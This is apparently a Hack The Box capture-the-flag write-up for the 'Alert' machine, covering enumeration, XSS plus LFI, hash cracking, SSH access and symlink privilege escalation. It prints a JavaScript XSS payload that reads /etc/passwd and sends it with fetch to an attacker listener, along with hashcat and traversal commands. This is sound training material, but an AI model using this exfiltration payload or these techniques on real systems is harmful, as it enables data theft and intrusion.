Hack The Box: Alert

Author: Davis Burrill
Difficulty: Easy

---

🗂 Repository Structure

📆 Alert
 ├ 🗂 nmap
 ┃ ┃ ├ 🕌 alert.nmap # Full nmap scan results
 ┃ ┃ ├ 🕌 alert.gnmap # Greppable nmap output for quick analysis
 ┃ ┃ ├ 🕌 alert.xml # XML nmap output for detailed parsing
 ┃ ┃ ├ 🕌 alert_extended.nmap # Extended nmap scan results
 ┃ ┃ ├ 🕌 alert_extended.gnmap # Greppable extended nmap output
 ┃ ┃ └ 🕌 alert_extended.xml # Extended XML nmap output
 ├ 🗂 payloads
 ┃ ┃ └ 🕌 markdown_test.md # Test markdown payload for XSS
 ├ 🗂 fuff_results
 ┃ ┃ └ 🕌 index_fuzz
 ├ 🗂 Screenshots
 ┃ ┃ ├ 🕌 albert_passwd.png # Screenshot of /etc/passwd retrieved via LFI
 ┃ ┃ ├ 🕌 alert_dash.png # Screenshot of the dashboard
 ┃ ┃ ├ 🕌 base64.png # Screenshot of base64-encoded data
 ┃ ┃ ├ 🕌 config.png # Screenshot of Apache configuration
 ┃ ┃ ├ 🕌 contact_page.png # Screenshot of contact page
 ┃ ┃ ├ 🕌 exfiltration_script.png # Screenshot of XSS script used for exfiltration
 ┃ ┃ ├ 🕌 ffuf_pages.png # Screenshot of ffuf results
 ┃ ┃ ├ 🕌 gobuster.png # Screenshot of gobuster results
 ┃ ┃ ├ 🕌 hosts.png # Screenshot of /etc/hosts modification
 ┃ ┃ ├ 🕌 line_sync.png # Screenshot of symbolic link creation
 ┃ ┃ ├ 🕌 markdown_viewer.png # Screenshot of markdown viewer
 ┃ ┃ ├ 🕌 monitors_dir.png # Screenshot of monitors directory
 ┃ ┃ ├ 🕌 nc_output.png # Screenshot of netcat capturing data
 ┃ ┃ ├ 🕌 nc_test.png # Screenshot of netcat test
 ┃ ┃ ├ 🕌 nmap.png # Screenshot of nmap results
 ┃ ┃ ├ 🕌 passwd.png # Screenshot of /etc/passwd
 ┃ ┃ ├ 🕌 statistics_login.png # Screenshot of login page
 ┃ ┃ ├ 🕌 user_flag.png # Screenshot of user flag
 ┃ ┃ └ 🕌 website_monitor.png # Screenshot of website monitor
 └ 🗂 albert_hash.txt

1⃣ Enumeration 🔍

The first step in tackling the Alert machine was performing an nmap scan to enumerate open ports and services:

nmap -sSCV -Pn -oA nmap/alert_extended 10.10.11.44

Findings:

• Open Ports:
  • Port 22: OpenSSH 8.2p1 (Ubuntu)
  • Port 80: Apache HTTP Server 2.4.41

Port 80 hosted a web application titled "Alert - Markdown Viewer." It provided an interface for uploading and viewing markdown files, which suggested potential input handling vulnerabilities.

---

2⃣ Exploitation 💥

Step 1: Enumerating the Web Application

Fuzzing for Endpoints

Used ffuf to discover additional pages and directories within the web application:

ffuf -w ~/SecLists/Discovery/Web-Content/common.txt -u 'http://alert.htb/index.php?page=FUZZ' -fs 690

Results:

• Discovered paths:
  • /about
  • /alert
  • /contact
  • /donate
  • /messages

Accessing /messages revealed a parameterized endpoint file, which could potentially be vulnerable to Local File Inclusion (LFI).

---

Step 2: Exploiting XSS and LFI

Initial XSS Test

Uploaded a .md file with the following payload:

<script>
    alert(1);
</script>

The browser displayed a JavaScript alert, confirming XSS.

Data Exfiltration with XSS

Modified the payload to retrieve sensitive file contents using Contact Us:

<script>
var url = "http://alert.htb/messages.php?file=../../../../../etc/passwd";
var attacker = "http://10.10.14.3:9001/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)));
    }
};
xhr.open("GET", url, true);
xhr.send(null);
</script>

1. Uploaded this payload as a .md file.
2. Clicked "View Markdown," shared the link in the Contact Us page.
3. Started a listener with nc -l 9001 to capture base64-encoded data.
4. Decoded the data in CyberChef to retrieve sensitive files.

---

Step 3: Cracking Password Hashes

Extracting Hashes

Sensitive files revealed user-specific hashes, including an Apache htpasswd file:

$apr1$MoRBJOg$***************

Cracking Hashes with Hashcat

Used hashcat to crack the hash:

hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Results:

• Successfully retrieved the password for the user.

---

Step 4: Gaining User Access

SSH Access

Used the cracked password to SSH into the machine as user albert:

ssh albert@alert.htb

Verification:

• Accessed the user.txt flag in Albert's home directory.

Identifying Running Processes

Executed ps aux | grep 8080 to analyze running services:

albert@alert:~$ ps aux | grep 8080
root         999  0.0  0.6 207256 26524 ?        Ss   Feb05   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

This showed that a PHP server was hosting the /opt/website-monitor directory on 127.0.0.1:8080.

---

3⃣ Privilege Escalation ⬆️

Vulnerability in /opt/website-monitor

The application stored monitoring scripts and logs in the monitors directory. Exploited a symbolic link vulnerability to access restricted files:

ln -s /root/root.txt root.txt
cat root.txt

This symbolic link redirected access to the root flag, which was readable through the web interface.

---

4⃣ Screenshots 📸

1. LFI Exploit: Screenshot of successfully retrieving sensitive files.
2. Markdown Viewer: Screenshot of payload upload and "Share Markdown" action.
3. Netcat Listener: Screenshot capturing base64 data from the listener.
4. Hashcat Crack: Screenshot of hashcat cracking the user password.
5. SSH Access: Screenshot verifying successful SSH access.
6. Privilege Escalation: Screenshot demonstrating the symbolic link exploit.

---

🔹 Key Takeaways

• Vulnerability Used: Local File Inclusion (LFI), XSS, weak password hashing, and symbolic link vulnerabilities.
• Techniques Learned:
  • Using ffuf for web application fuzzing.
  • Automating data exfiltration with crafted payloads.
  • Cracking hashes with hashcat.
  • Exploiting symbolic links for privilege escalation.

---

🔗 Links

• My Cybersecurity Blog
• Hack The Box

Happy Hacking! 🚀